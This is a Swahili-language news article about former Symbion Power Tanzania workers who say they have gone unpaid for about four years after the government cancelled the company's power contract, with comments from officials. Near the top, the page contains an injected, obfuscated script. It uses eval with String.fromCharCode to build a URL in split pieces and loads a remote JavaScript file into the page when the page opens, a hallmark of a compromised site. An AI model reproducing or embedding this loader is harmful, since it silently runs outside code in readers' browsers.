Recent Comments

Utata mtupu stahili za wafanyakazi SYMBION

By Juma Issihaka Jul 10, 2020
<p>Mmiliki wa SPTL, Paul Hinks.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Mmiliki wa SPTL, Paul Hinks.

IKIWA ni mwaka wa nne sasa tangu serikali ivunje mkataba tata na Kampuni ya Symbion Power Tanzania Limited, iliyokuwa ikizalisha Megawati 112 za umeme unaotumia mitambo ya gesi, kwa Shirika la Umeme Tanzania (TANESCO), wafanyakazi wa kampuni hiyo wamebainisha kwa kipindi hicho chote wamekuwa wakitaabika kwa kutolipwa stahili zao.

Kwa mujibu wa wafanyakazi hao, uongozi wa Symbion umekuwa ukipiga chenga kukutana nao, hata wachache wanaobahatika kuwasiliana nao, wanawajibu kuwa bado kuna mazungumzo yanaendelea na serikali ya Tanzania na kwamba fedha za kuwalipa zitapatikana pale, serikali itakapoilipa kampuni hiyo ya Kimarekani fidia za kuvunja mkataba.

Wamesema kwa sasa tegemeo lao ni Rais Dk. John Magufuli, awasaidie kufanikisha upatikanaji wa haki zao, kwani tayari wameshazunguka idara kadhaa za serikali kuomba msaada wa kumalizwa kwa changamoto hiyo bila mafanikio.

Aidha serikali imekili kuwepo kwa mazungumzo ya kirafiki na kampuni hiyo, ili watakapofikia maridhiano waweze kuilipa na kuongeza kuwa suala la mazungumzo yao na Symbion halihusiani na stahiki za wafanyakazi wake, hivyo ni wajibu wa kampuni kuwalipa haraka pasi na kutafuta kisingizio.

Mkataba wa PPA, kati ya TANESCO na Symbion Power Tanzania Limited ulisitishwa mwaka 2016 baada ya serikali ya Tanzania kubaini inanyonywa mabilioni ya fedha huku kiasi cha umeme unaozalishwa hakikidhi haja ya nchi.

Ikumbukwe kuwa wakati huo, Tanzania iligubikwa na hali ya giza totoro kutokana na kukauka kwa vyanzo vya maji ikiwemo mabwawa yaliyokuwa yakitumika kuzalisha umeme kwa TANESCO, hali iliyoifanya serikali kutafuta kampuni ya nje ili kusaidia uzalishaji wa nishati hiyo ambapo awali iliipata Kampuni ya Richmond LLC, DOWANS SA na baadae ndio Symbion.

Pia Mkataba huo ulisainiwa Disemba mwaka 2015, ambapo Symbion ilitakiwa kuzalisha umeme kwa mitambo inayoendeshwa kwa gesi, kwa kipindi cha miaka 15, yaani hadi 2030 na baadae Januari 26, mwaka 2016, TANESCO chini ya Mkurugenzi wake wakati huo, Felchesmi Mramba, iliiandikia kampuni hiyo barua ya kusimamisha mkataba.

Kuanzia Mei 26, mwaka huo, kwa mujibu wa taarifa kutoka vyanzo vya uhakika vya www.simamia.com, mitambo ya kuzalisha umeme ilizimwa rasmi na ilipofika Disemba mwaka 2016, malipo ya wafanyakazi yalianza kusuasua wakawa wanaishia kulipwa posho kila baada ya miezi miwili na Mkenya aliyetambulishwa kwao kama msimamizi wa kampuni, Stanley Munai kwa kiburi cha hali ya juu.

“Huyu Stanley tumekuwa tukiomba nafasi ya kuonana nae atupe uhalisia hataki na pia hatuonyeshi ushirikiano, umefikia wakati tunambembeleza sana kutupatia hata posho zetu na akiamua kutoa anamtumia mmoja wa wafanyakazi ambae ni Meneja msaidizi wa kituo, kutupatia hiyo posho yeye hatuonani nae,” kilieleza chanzo hicho.

Vyanzo hivyo vinaeleza kuwa kiasi cha posho wanazolipwa hakifikii hata robo ya mishahara yao halisi na huduma kama bima ya afya na nyinginezo zilisitishwa, hali ambayo inazua changamoto katika kujikimu na familia zao, ikiwemo kulipa ada za watoto shule, malipo ya pango la nyumba na nyinginezo.

Aidha vyanzo hivyo vya uchunguzi vimebainisha kuwa kampuni ya Symbion ndio ile iliyoitwa DOWANS kwani wamiliki wake walibaki kuwa walewale, kwamba kilichofanywa ni kubadilishwa majina baada ya serikali kustukia madudu yaliyokuwa yakifanywa nao.

Katika mahojiano ya kiuchunguzi ya www.simamia.com na mmoja wa wafanyakazi hao (Jina lake limehifadhiwa), anasema kwa kipindi cha miaka minne wamekuwa wakipigwa chenga wanapoomba kukutana na uongozi ili wazungumze nao kuhusu kulipwa stahiki zao.

Anasema kwa kipindi hicho chote wamekuwa wakitakiwa kwenda ofisini huku hakuna ishara ya kulipwa mishahara yao, hali inayosababisha baadhi yao kushindwa kujikimu na familia zao.

Anaongeza kuwa hata wenzao wanaopata nafasi ya kuwasiliana na Mkurugenzi wa Kampuni hiyo ambaye anadaiwa kuwa yupo nchini Marekani kwa sasa Paul Hinks, anaishia kuwajibu kuwa hatma ya stahiki zao ni pale watakapolipwa fidia na serikali ya Tanzania.

“Sisi hatujui chochote kuhusu mazungumzo yao, kwakuwa tuliajiriwa kisheria na tunayo mikataba ni vyema waangalie namna ya kutulipa stahiki zetu, familia zetu zinateseka,”

“Tunamuomba Rais Dk. John Magufuli asikie kilio chetu, familia zetu zinateseka ilhali tunazo fedha haki zetu zilizoshikiliwa na kampuni na hawaonyeshi nia ya kutulipa, tunayo imani ya dhati kuwa Rais ndiye atakayetukomboa, tunaomba msaada wake aingilie kati madai yetu ili atuokoe,” anasema.

Vyanzo vyetu vya uchunguzi vimenasa mazungumzo ya Mkurugenzi wa Kampuni hiyo Paul Hinks, na mmoja wa wafanyakazi wa Symbion raia wa Tanzania, yaliyofanyika August mwaka jana na baada ya kuulizwa kuwa ana mpango gani juu ya stahiki zao alijibu,

“AG (Mwanasheria Mkuu wa Serikali ya Tanzania), ametuomba tuwasilishe pendekezo letu kwa maandishi, hiyo tunafanya wiki hii, amesema atajibu mwishoni mwa Septemba 2019,”

“Wakati huo tutajua ikiwa tunaweza kumaliza makubaliano ama laa, lakini kuna dalili nzuri zinazoonekana ila hatuwezi kuwa na uhakika bado,” alijibu Paul Hinks.

Alipoulizwa kuhusu uhusiano wake na kesi ya kushikiliwa kwa ndege ya Shirika la Anga la Tanzania (ATCL) nchini Afrika Kusini Hinks alijibu,

“Kesi yangu haina uhusiano wowote na ndege ya ATCL iliyokamatwa nchini Afrika Kusini, najua watu wanachanganya mambo na kuunganisha marumbano lakini kweli, ndege hiyo imekamatwa na mkulima huko SA (South Africa)”.

Pia taarifa za kiuchunguzi zinaeleza kuwa kiongozi aliyetambulishwa kwao kama msimamizi wa Kituo hicho nchini anaitwa Stanley Munai ni raia wa Kenya, ambaye ndiye anahusika na malipo ya posho kwa wafanyakazi hao, kwa kiburi na baada ya kubembelezwa sana.

“Hata kama hawajalipwa si haki kubaki na mishahara yetu sisi watoto wetu watakula nini? Tunaomba Rais Dk. Magufuli alione hili na kutusaidia wananchi wake, huyu Stanley anatulipa posho baada ya kumbembeleza sana tena anazituma kwa simu kwa mmoja wa wafanyakazi wenzetu ilimradi tusionane naye,” anasema mmoja wa wafanyakazi hao.

Anasema mazungumzo yao na serikali hayahusiani na kuajiriwa kwao, na kama wanaambiwa hawatalipwa mpaka mazungumzo na serikali yatakapokwisha wataendeshaje familia zao endapo mzungumzo yataendelea kwa miaka 10.

Baadhi ya Mitambo ya kuzalisha umeme ya Kampuni ya Symbion Power Tanzania Limited (SPTL) iliyopo Power Plant Ubungo jijini Dar es Salaam.

HATUA WALIZOCHUKUA

Mfanyakazi huyo anasema miongoni mwa hatua walizochukua kufanikisha upatikanaji wa haki zao, walishaandika barua kwenda idara kadhaa za serikali bila mafanikio.

Kuhusu kwenda mahakamani, anasema hawakuwahi kupeleka malalamiko yoyote mahakamani licha ya kwamba kumekuwa na uvumi huo, kwamba sababu ya kutopeleka mahakamani ni hofu ya kutumia siku nyingi na fedha nyingine kuendesha kesi ilhali hawana vyanzo vya mapato.

“Hatukuwahi kupeleka mahakamani suala hili sisi tulikuwa tunapeleka malalamiko yetu kwa idara kadhaa za serikali lengo ni mamlaka husika zione uonevu tunaofanyiwa, watu wanahisi kuwa kuna kesi inayoendelea mahakamani lakini hakuna ukweli wowote, tunajua taratibu za kupeleka kesi mahakamani zitatuhitaji fedha nyingi kuendesha tutazipata wapi ilhali hatuna namna ya kuzalisha,” anasema.

STANLEY AKANA KUHUSIKA NA SYMBION

Kufuatia tuhuma hizo za manyanyaso ya wafanyakazi hao www.simamia.com ilizungumza na Stanley Munai ambaye ndiye aliyekuwa Mtendaji Mkuu wa Kampuni ya Symbion Power Tanzania Limited (SPTL) nchini, alikana kuhusika na kampuni hiyo kwa sasa.

“Mambo ya Symbion siwezi kusema chochote kwa wakati huu, kwa sababu mimi sihusiki tena nilishaacha muda mrefu, kwa hiyo ukitaka jambo lolote kuhusu kampuni hiyo mtafute mmiliki ambaye ni Paul Hinks anaishi Marekani,” anajibu Stanley.

UKWELI KUHUSU MAZUNGUMZO

Akizungumzia sakata hilo Kaimu Kamishna wa Umeme na Nishati Jadidifu Mhandisi Edward Ishengoma, anasema amefanya mawasiliano na Maofisa kutoka TANESCO na Wizara ya Nishati nao wamethibitisha kuwepo kwa mazungumzo kati ya serikali na Symbion ambayo yako chini ya Ofisi ya Mwanasheria Mkuu wa Serikali Profesa Adelardus Kilangi.

Anasema pamoja na kuwepo kwa mazungumzo hayo lakini hiyo sio sababu ya Symbion kutowalipa wafanyakazi wake kwani wakati wanaingia mikataba ya kupeana ajira serikali haikuhusika, hivyo mishahara ni haki ya wafanyakazi kisitafutwe kisingizio.

“Sitambui mikataba yao ikoje wakati wanapeana ajira lakini suala la mishahara ya wafanyakazi halihusiani na mazungumzo ya Kampuni ya Symbion na serikali,” anasema.

KATIBU WIZARA YA KAZI ASHAURI

Kwa upande wake Katibu wa Naibu Waziri wa Nchi Ofisi ya Waziri Mkuu, Kazi, Ajira na Wenye Ulemavu (Kazi na Ajira), Mkama Nyamwesa, anasema ni wajibu wa mwajiri kumlipa mfanyakazi.

Anasema kama zinazuka sababu zilizo nje ya makubaliano wakati wanapeana mikataba ya ajira, hayo yasihusishwe kuathiri au kuchelewesha kulipwa kwa mwajiriwa ni kinyume cha sheria.

“Kutolipwa ni kero, sababu mtu yeyote anakubali kuajiriwa kwa makubaliano kwamba baada ya kufanya kazi atalipwa ujira wake, chochote kikitokea kuhusu kampuni hiyo ni nje ya utaratibu wa malipo anapaswa alipwe kwasababu amefanya kazi,” anasema.

Anashauri kuwa kwa mujibu wa sheria ya kazi na ajira mwajiriwa yeyote anayeonyeshwa nia ya kucheleweshewa kulipwa au kutolipwa kabisa kipo chombo maalumu kwa ajili ya kupeleka malalamiko ili apatiwe haki yake.

Anasema ni muhimu kwa wafanyakazi wenye malalamiko ya stahiki zao wayapeleke Tume ya Usuluhishi na Uamuzi (CMA), kwani ndio chombo kilichoundwa kusimamia sheria na haki ya mfanyakazi,

“CMA yenyewe inayo mamlaka ya kisheria ya kutoa amri ya kuitwa kwa kampuni na kuitaka imlipe mfanyakazi wake, kama haina uwezo basi zinaangaliwa mali ilizonazo zinauzwa kufidia malipo ya mfanyakazi huyo, huo ndio utaratibu mzuri,” anasema.

Aliyekuwa Rais wa Marekani Barack Obama, akizungumza katika uzinduzi wa mitambo ya Kampuni ya SPTL, alipofanya ziara yake nchini Tanzania mwaka 2013

SERIKALI YAWEKA WAZI MAZUNGUMZO HAYO

Simamia ilifanya mazungumzo na Mwanasheria Mkuu wa Serikali Profesa Adelardus Kilangi, ofisini kwake jijini Dodoma na kubainisha uwepo wa mazungumzo ya kirafiki yanayoendelea chini yake na kampuni hiyo.

Anasema sababu ya kutokamilika kwa mazungumzo hayo ni maelewano katika baadhi ya maeneo ambapo Symbion inataka kulipwa fedha za fidia ya mkataba mzima ambao ni miaka 15 huku serikali imesema iko radhi kulipia muda iliyotumia huduma hiyo tu, ambao ni miezi 13.

Kuhusu stahili za wafanyakazi hao Profesa Kilangi anasema, hayo ni makubaliano kati ya mfanyakazi na mwajiri hivyo hawezi kuzungumzia hilo kwani hakuwepo wakati wanaopeana mikataba ya ajira.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.